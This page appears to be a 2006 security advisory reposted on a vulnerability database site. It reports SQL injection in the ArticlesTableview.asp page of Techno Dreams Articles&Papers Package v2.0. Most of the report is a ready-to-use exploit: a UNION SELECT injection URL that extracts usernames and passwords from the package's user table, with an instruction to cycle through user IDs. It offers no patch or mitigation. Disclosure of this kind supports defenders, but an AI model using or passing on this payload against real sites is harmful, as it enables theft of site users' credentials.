Computer Security

Security Advisory: Techno Dreams Articles&Papers Package <=v2.0(ArticlesTableview.asp) Remote SQL Injection Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  BizDirectory all version xss

  PhotoPost PHP  4.6 - 4.5 [PP_PATH] >> Remote File Include Vulnerability

  Sql injection in Moodle

  MyBB 1.2 Full path and Cross site scripting vulnerabilities

From:ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date:19.09.2006
Subject:Techno Dreams Articles&Papers Package <=v2.0(ArticlesTableview.asp) Remote SQL Injection Vulnerability

Vulnerability Report
*******************************************************************************
# Title  :  Techno Dreams Articles&Papers Package <=v2.0(ArticlesTableview.asp) Remote SQL Injection Vulnerability

# Author :   ajann

# Script Page : http://www.t-dreams.com

# Exploit;

*******************************************************************************

###http://[target]/[path]/ArticlesTableview.asp?key='[SQL HERE]

Example: ArticlesTableview.asp?key=-1%20union%20select%200,0,0,0,userpassword,
username,0,0,0,0,0,0,0,
0%20from%20articlesusers%20where%20userid=18

Pls UserID Change(1,2,3,4,5.....)

# ajann,Turkey
# ...
# Im not Hacker!
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod
 


Rating@Mail.ru